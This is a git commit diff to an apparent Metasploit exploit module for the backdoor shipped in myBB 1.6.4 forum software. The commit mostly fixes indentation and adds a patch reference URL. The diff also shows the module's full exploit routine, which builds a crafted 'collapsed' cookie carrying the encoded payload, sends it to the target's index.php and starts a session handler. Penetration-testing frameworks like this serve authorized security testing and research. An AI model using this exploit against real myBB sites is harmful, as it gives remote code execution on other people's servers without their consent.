Fix indentation, white spaces, add patch URL to reference

git-svn-id: file:///home/svn/framework3/trunk@13847 4d416f70-5f16-0410-b530-b9f4589650da
2011-10-09 20:39:02 +00:00 · 2011-10-09 20:39:02 +00:00 · 9ddfc122af
parent 262b3bbe00
commit 9ddfc122af
1 changed files with 18 additions and 23 deletions
--- a/modules/exploits/unix/webapp/mybb_backdoor.rb
+++ b/modules/exploits/unix/webapp/mybb_backdoor.rb
@ -20,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'myBB 1.6.4 Backdoor Exploit',
 			'Description'    => %q{
-					myBB is a popular open source PHP forum software. Version 1.6.4 contained an 
-					unauthorized backdoor, distributed as part of the vendor's source package.
+				myBB is a popular open source PHP forum software. Version 1.6.4 contained an 
+				unauthorized backdoor, distributed as part of the vendor's source package.
 			},
-			'Author'	=>
+			'Author'         =>
 				[
 					'tdz',
 				],
@ -31,10 +31,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					[ 'BID', '49993'  ],
+					[ 'BID', '49993' ],
 					[ 'SECUNIA', '46300' ],
-					[ 'OSVDB', '76111' ],
-					[ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ]
+					[ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ],
+					[ 'URL', 'http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt' ]
 				],
 			'Privileged'     => false,
 			'Platform'       => ['php'],
@ -48,12 +48,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        => [ ['Automatic', { }], ],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Oct 06 2011'
-			))
+		))

-			register_options(
-				[
-					OptString.new('URI',	[ true, "myBB path", '/index.php']),
-				], self.class)
+		register_options(
+			[
+				OptString.new('URI', [ true, "myBB path", '/index.php']),
+			], self.class)
 	end


@ -63,11 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote

 	def check
 		print_status("Checking target")
-		res = send_request_raw(
-			{'method' => 'GET',
-			'uri' => uri},
-			10
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri' => uri
+			}, 10
 		)
+
 		if (not res) or (not res.code.between?(200,299))
 			return Exploit::CheckCode::Safe
 		else
@ -76,22 +77,17 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def exploit
-	
 		print_status("Sending exploit request")

-		# See the patch at http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt
 		# for details of the backdoor mechanism. 
 		cookie = "collapsed=0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|"
 		cookie << Rex::Text.uri_encode(payload.encoded)
-		
+
 		response = send_request_raw({
 			'method'  => 'GET',
 			'global' => true,
 			'uri' => uri,
-			'headers' =>
-				{
-					'Cookie' => cookie,
-				}
+			'headers' => { 'Cookie' => cookie }
 		},10)

 		if (not response) or (not response.code.between?(200,299))
@ -99,6 +95,5 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			handler
 		end
-
 	end
 end